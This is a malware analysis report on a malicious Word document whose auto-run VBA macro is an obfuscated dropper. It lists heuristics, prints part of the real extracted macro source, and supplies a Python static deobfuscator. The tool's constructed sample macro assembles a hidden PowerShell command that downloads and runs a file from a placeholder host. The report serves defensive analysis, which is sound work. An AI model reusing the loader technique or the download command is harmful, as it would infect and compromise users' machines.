Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5360451f2d59c9e3…

MALICIOUS

Office (OLE)

Size: 175.5 KB
Created: 2017-11-23 04:43:00
Authoring application: Microsoft Office Word
First seen: 2017-11-29
MD5: 3b50a57e8340dfc3da02fe7933cee7f0
SHA-1: 52e236ea6af50e2b924d8535c75e0aae2f7afd96
SHA-256: 5360451f2d59c9e3374010fe44b462051c9f5fc9f856ddaab1c2416bca545e2a
Risk score: 304

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1140 Deobfuscate/Decode Files or Information

The file contains a VBA project with an AutoOpen procedure, the standard auto-execution entry point for malicious documents. The macro is heavily obfuscated and calls Shell(), so it is built to execute arbitrary commands. The ClamAV signature Doc.Dropper.Agent-6381297-0 classifies it as a dropper, consistent with a loader that fetches and runs a second-stage payload. The two URLs extracted from the document body (the OOXML DrawingML schema namespace and a malformed fragment) are informational only and do not establish the download location; in this loader shape the stage-two URL, if present, is reconstructed at runtime by the macro's string decoder rather than appearing in the source.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6381297-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6381297-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro source contains a Shell() call, an execution sink
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source, so plain string searches over the extracted code miss them.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen procedure, which Word runs automatically when the document is opened
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents, where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. The rule description states that it applies when no modern VBA project was recovered and no stronger macro-virus family marker was present; in this sample a VBA project was recovered (macros.bas below), so treat this marker as corroborating the VBA findings rather than as independent evidence.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www271+271.heineken.iNBT+N (in document text, OLE body; "+" is not valid in a hostname, so this is a fragment rather than a usable URL)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; the standard DrawingML schema namespace, benign)
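A worked deobfuscation step for the loader shape these heuristics describe, added here as analyst tooling; it is not part of the sandbox output and not the sample's own code. The extracted macro preview below shows the pattern: long padded alphanumeric literals, a Mid() window cut from each, and junk Array() lines in between, with nothing readable in the source. Rather than executing the macro, the Python below statically emulates the string-building VBA subset (Mid, Replace junk-token removal, Chr() pieces, StrReverse, & concatenation) and then resolves the argument lists handed to Shell/CreateObject/Run sinks. The embedded SAMPLE is a constructed macro in the same shape, not the real macros.bas; example.invalid is a placeholder host, and the built-in set is limited to what this shape needs, so loops, hex decoding and object calls are left unresolved rather than guessed.

```python
"""Static emulation of the string-building VBA subset used by obfuscated Office loaders, then resolution of what reaches Shell/CreateObject/Run. Nothing is executed."""
import re
TOKEN_RE = re.compile(r'\s*(?:("(?:[^"]|"")*")|(\d+)|([A-Za-z_]\w*)|([&,()]))')
ASSIGN_RE = re.compile(r'^(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$')
SINK_RE = re.compile(r'\b(Shell|CreateObject|GetObject|Run|Exec)\b', re.I)
LITERAL_RE = re.compile(r'"(?:[^"]|"")*"')
# The VBA built-ins this loader shape relies on (Mid is 1-based, length optional).
BUILTINS = {"mid": lambda s, start, n=None: s[start - 1:] if n is None else s[start - 1:start - 1 + n],
            "replace": lambda s, old, new: s.replace(old, new), "chr": chr,
            "strreverse": lambda s: s[::-1], "array": lambda *a: list(a)}
# Constructed sample in the shape of the page's preview (junk Array() noise, padded literals sliced with Mid, Replace junk tokens, Chr() pieces); NOT the real macros.bas.
SAMPLE = '''
Sub AutoOpen()
    rFvYPaW = "zqKh7cmd.exe /c powershell -w hidden"
    Dmvwu = Array("wrwSPEjw", "kdwOfdZs", "JBEitkWo", "AuZwPnuC")
    XawXf = Mid(rFvYPaW, 6, 31)
    pFsjq = Replace("ht##tp://exam##ple.inva##lid/p.e##xe", "##", "")
    EhkKtK = Chr(40) & "New-Object Net.WebClient" & Chr(41) & ".DownloadString('" & pFsjq & "')"
    wMvOD = XawXf & StrReverse(" c- ") & EhkKtK
    Set IOjANqfhn = CreateObject(StrReverse("llehS.tpircSW"))
    IOjANqfhn.Run wMvOD, 0
End Sub
'''

def strip_comment(line):
    return re.match(r'(?:[^"\']|"(?:[^"]|"")*")*', line).group()  # text before a ' outside literals

def tokenize(expr):
    tokens, pos, expr = [], 0, expr.strip()
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            raise ValueError("unsupported syntax near %r" % expr[pos:pos + 12])
        pos, (s, num, ident, op) = m.end(), m.groups()
        tokens.append(("str", s[1:-1].replace('""', '"')) if s is not None else  # "" escapes a quote
                      ("num", int(num)) if num is not None else
                      ("id", ident) if ident is not None else ("op", op))
    return tokens

def parse_list(t, i, env, whole=False):  # args := expr (',' expr)* ; whole=True rejects leftover tokens
    v, i = parse_expr(t, i, env)
    vals = [v]
    while i < len(t) and t[i] == ("op", ","):
        v, i = parse_expr(t, i + 1, env)
        vals.append(v)
    if whole and i != len(t):
        raise ValueError("trailing tokens")
    return vals, i

def parse_expr(t, i, env):  # expr := term ('&' term)* ; & concatenates, coercing numbers to text
    val, i = parse_term(t, i, env)
    while i < len(t) and t[i] == ("op", "&"):
        rhs, i = parse_term(t, i + 1, env)
        val = str(val) + str(rhs)
    return val, i

def parse_term(t, i, env):  # term := literal | name | name '(' args ')' | '(' expr ')'
    kind, val = t[i]  # IndexError if the expression ends early
    if kind in ("str", "num"):
        return val, i + 1
    if kind == "id" and not (i + 1 < len(t) and t[i + 1] == ("op", "(")):
        return env[val], i + 1  # KeyError if never assigned
    if kind == "id":  # call; an unknown name raises KeyError and stays unresolved
        a, i = ([], i + 2) if t[i + 2] == ("op", ")") else parse_list(t, i + 2, env)
        val = BUILTINS[val.lower()](*a)
    elif (kind, val) == ("op", "("):
        val, i = parse_expr(t, i + 1, env)
    else:
        raise ValueError("unexpected token %r" % (val,))
    if t[i] != ("op", ")"):
        raise ValueError("expected )")
    return val, i + 1

def emulate(source):
    """Walk assignments in order; anything unsupported is skipped, never guessed."""
    env = {}
    for raw in source.splitlines():
        try:  # an assignment must yield exactly one value
            if m := ASSIGN_RE.match(strip_comment(raw).strip()):
                env[m.group(1)], = parse_list(tokenize(m.group(2)), 0, env, whole=True)[0]
        except (KeyError, ValueError, IndexError, TypeError):
            pass
    return env

def find_sinks(source, env):
    """(sink name, resolved argument list or None) for each line touching an execution/COM sink."""
    hits = []
    for raw in source.splitlines():
        line = strip_comment(raw).strip()
        # Mask literal contents (same length) so "Shell" inside a string is not taken as a sink.
        m = SINK_RE.search(LITERAL_RE.sub(lambda s: '"' + " " * (len(s.group()) - 2) + '"', line))
        if m:
            try:
                t = tokenize(line[m.end():])
                t = t[1:-1] if t and t[0] == ("op", "(") and t[-1] == ("op", ")") else t  # f(x) form
                hits.append((m.group(1), parse_list(t, 0, env, whole=True)[0]))
            except (KeyError, ValueError, IndexError, TypeError):
                hits.append((m.group(1), None))
    return hits
```

Feed olevba output to emulate() and then find_sinks(); on the SAMPLE above the Run sink resolves to the full PowerShell download command and CreateObject to WScript.Shell, neither of which appears anywhere in the source. Applied to the page's own first window, Mid(rFvYPaW, 25, 27) over the literal on the line above it, the result is another opaque alphanumeric string, so the recovered environment should be treated as input to whatever the truncated remainder of the macro does with these windows, not as the final answer.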

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 207661 bytes
SHA-256: 923ceb4cd9c1647c2f2912102489ad7a5c3424f652221ca8a992826d9a5ce05a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 104 long base64-like blob(s). The long random alphanumeric literals visible in the preview below match this check whether or not they are real base64; in this loader shape they are padding around Mid() windows rather than encoded payload.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KIjMwdfGB"
Function YrKIhDfAR()
rFvYPaW = "rq5u0Mu7RVlhqji7FGFRurkzaGaLTBYdcNSOulmGNLjABQXSSWNGWon0RAPqM0duqh"
Dmvwu = Array("wrwSPEjw", "kdwOfdZs", "JBEitkWo", "AuZwPnuC", "kCbTlTMI", "aGkrKzLa", "GPLWvncO", "UHSVfkjz")
XawXf = Mid(rFvYPaW, 25, 27)
jBWXOKXMUKX = Array("vGPiRBSG", "TEjtjAhN", "TuvBQECj", "awdRowGs", "zNldiXJS", "CBZZKhmc", "NKCVVJNq", "DfIVYARW")
pFsjq = "WNqdupjKutDqzlATDtvVkYFJCDjwhqKcZpuMQckDiwtTtVzKCPlioCYGPOLPFidEibRIqnDaIsqmimPjEYvSFcnWQozCRVzwUpkSDqUPMLavMmbdwiKjmLzGnvrCqAImutRoBwcNEjGtBsJiMTDnLRJIqdfIzRYLDoBSUmcBBzbGaTdEBiGcwvSJEikKbjwKjvadH79kq"
EhkKtK = Array("zLZEarIt", "rkuUmwCC", "bsVNswDZ", "uJFHKsbz", "PTCiqRHb", "JzGsMWkS", "RqwvUIwB", "IzKQlBjw")
wMvOD = Mid(pFsjq, 6, 167)
IOjANqfhn = Array("SNNLWOiB", "ZrrFpHNk", "zJziFvzs", "Szaofktf", "jlhVbDSP", "nkIAqPVh", "TSrzcGrX", "PUtZopVo")
fHnqkBnIYTl = "0rLEiQhAVEa9fSHLlRLJPldiQZNaaNEUbBtNsJjYdKandqEmWXtGIdcrcvvoAZCbimvbNVSbimjFKqBaVbECUzMzZBlzOvYEIwFqucZBFRYWzXjmtUSZVzHkawCLjVNmNbwMlKftCDzCZpzBUzDtcziIqUQwZNRjElIVbUBipZWRBFKkwBrkRTKOsnVQujTolNzojdazwUEDcRHlKjzXVjWwH1l"
IvNCmchwmwE = Array("CkVGftBJ", "DPqSHfcI", "wdTuaSoD", "VKHnDAko", "tBOnbAlD", "ZvXCraFV", "FTWZWtIk", "vRkVmOFD")
WzVHUrFHi = Mid(fHnqkBnIYTl, 16, 199)
GDKtTOzWP = Array("DwjhbwHI", "OvrGWCBV", "oZDUArvz", "FFvRUftG", "lPWIUfVo", "ihkQXwHR", "zaFbShtM", "AhcVDqoj")
FfPCB = "8wdsuzUjniBzIQ2FqEEKXcEizYLfiBjbRZmXzlzUHQMlYtcoWSPpiVALjXqOCArQIswFQTvTrOMGPzHNucfQmrzwYbqculRGZvdjvWYCWvwPIuviQdTaVbiRuBhpdTYFzGhUUaSXDctqshoifHLRSrlzRLltpjZCWsSCNbOpKvWshnYNNCJVHHnGUjCJpZiUDrUAPmQDtVGWVsQdmYfnaDvPELhiZFAlNC81hD7"
ZadpTvUQSu = Array("zfPZEMWZ", "mTdrwRsb", "OfijRCwh", "dYjVjkSf", "mAOvEPUl", "iZdzikkN", "bEvmlmAw", "iiwjdApC")
qONnBPjETMM = Mid(FfPCB, 29, 198)
CfliiUNEwqK = Array("zKoaOWtG", "iSvFiLbN", "ohDaAQfT", "uDEckQSQ", "pFGOqPvj", "wJSNaTpZ", "zAzPTIbi", "fUfKRQWR")
qEVLzUmAiaw = "GY6rK2QoUHFrMkWLfmUmYBrCqXmiKpobUOWcFvLiOXnAhdrVnGiGpaRHTXYsQidiSdXwNuGkamYBNqVNjRuEKiltwPIiWSRftJiDFsHsAufDBQtdBLMznZTksdCzmXNIUtIEISHnJBDQCirjWihKGSrTpzLbqJGcjWjIHoViEYpmVDhJmVbIqCCBBoOKHfwzvbmfBWfCjHBI6oBIjT088O3j"
tioEBbaEQoa = Array("WSbzuOqU", "phaFEfNs", "KZrjjiVC", "jVwSoNOE", "cJUtuSIV", "RXUcoTja", "UrNUuhGo", "zYSYQXfb")
ZcVvTrlfAkI = Mid(qEVLzUmAiaw, 7, 188)
HTZKRjXzIB = Array("lcHwzWNB", "LPwsEBTr", "tbqQwAWZ", "NbcbnYsf", "RFGEAZlI", "pqwrLVRC", "kHsKKOZl", "GikXtlNm")
kZGzs = "1wT7FFFulNqWwVbdkJwXQUOnHuqMqrJZrClNpDDlYkWmbCOhNYiLoFljjoOhwvYv54bOGiYwC9F4biSfB1uuSwUn8"
dpZiGfqp = Array("XoCXdjWA", "WuJTaujV", "EhDFMtwc", "mDvcCWbW", "WOCptJvY", "RYLYqOdG", "ZhtHJEKi", "rZkaktwz")
Nqktq = Mid(kZGzs, 5, 54)
wMNFESYEZ = Array("QVPUjvWD", "HwEfrlcE", "FrKtzLUK", "RkGItkaP", "cUIwiFVP", "kjladwjZ", "EnYhTzhE", "AFCwoNJW")
dAjzaMaVaDW = "3UWkCc17h7uk22hMHPcKhDzFNVzDYvLiCzaUiXipmjEjuwvKrcmLQbTQOLXLpHIUraZAUCijlnXzzTKRZnMvIzOadKGXASzfajpUXvqowDadEWRuBGmCuNLrMzWKwHiSnsWPiptizXwFZkWHsLWtjzkNXzHXZjsrUHpLzBQLMIEXRGRbcORklpmpIJsjiVERfFkRvKIruKhXsNwQj7HhBMBuU2uD1VY"
IUbOKYvH = Array("fUBuuCYz", "bbGaYNlv", "FmOjAZTT", "HqSstqAq", "wnprrFzY", "CtoBCWYU", "flGRCOjF", "BhnEjfGl")
VotXQkoh = Mid(dAjzaMaVaDW, 16, 194)
LdUcvOB = Array("qPNWSiFH", "aVQdwiCh", "adjMTtiz", "oGipJupv", "cEnAIaCE", "GtUUMtAr", "aatPcJwz", "hQhMEQzj")
MKPwQtSYtrU = "8obiMRwtDcMXMSIKPTAZjEiQWEXphllAWtFIKwzvUtrOQHRXMHhDCYEE7s2kuIitv"
nQPiY = Array("skDbOcZc", "PGHwUKNd", "wJzKhkoJ", "oRQcGjSM", "nqzqVJmT", "ZwhtIubv", "RCNJzLLI", "vtnzLwVi")
cEhDA = Mid(MKPwQtSYtrU, 5, 48)
TDjidGYr = Array("zKSisisi", "BaYdGbAj", "OGtQFEDn", "BiKvIIho", "ZfMXHmqm", "JIjsaYlA", "wwazAPrv", "GfjKTzVt")
ElpVrM = "KpFikJTwBEqLHPE5vYTwlPJiYcEzMtvaaOSdRVoBJXcciwobXiMGKXQjJPwWMpHwanDjloJpiasJIrNNUfNpXnQDzlUCZRpTQfCrvFqjUWcjfGXRBnpN"
mapbbws = Array("wvjSCjjm", "jisTLTBN", "TuVDljQV", "DozWfAqc", "UnZNmphz", "LtCOuhuz", "v
... (truncated)